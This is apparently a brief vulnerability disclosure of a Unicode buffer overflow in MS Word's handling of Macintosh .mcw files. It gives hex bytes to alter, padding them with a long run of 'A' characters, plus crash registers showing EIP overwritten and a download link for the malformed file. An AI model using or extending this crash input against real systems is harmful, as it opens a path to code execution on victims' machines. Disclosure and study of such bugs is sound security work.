UNICODE BUFFER OVERFLOW IN MS-WORD =================================== *.mcw is the ms-word format file for Macintosh. the unicode buffer overflow occurs when the user opens the malformed *.mcw document. Proof of concept: ----------------- by modifying the *.mcw file by using binary editor as follows these lines were taken from .mcw file: ------snip---mcw-file---- c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42 00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00 11 04 74 65 73 74 00 06 20 42 61 68 61 61 00 00 00 09 00 00 00 00 0f 54 69 6d 65 73 20 4e 65 77 ------snip--------------- change them as follows: c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42 00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00 11 04 74 65 73 74 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 00 06 20 42 61 68 61 61 00 00 00 09 00 00 00 00 0f 54 69 6d 65 73 ------------ EAX = 00000000 EBX = 00000000 ECX = 00000006 EDX = 7C90EB94 ESI = 00000001 EDI = 001262B0 EIP = 00410041 ESP = 00126110 EBP = 00410041 EFL = 00000246 ------------ * modified .mcw file can be downloaded from: http://study.haifa.ac.il/~bnaamnih/word/foo.mcw --------------------- Bahaa Naamnmeh b_naamneh@xxxxxxxxxxx www.bsecurity.tk
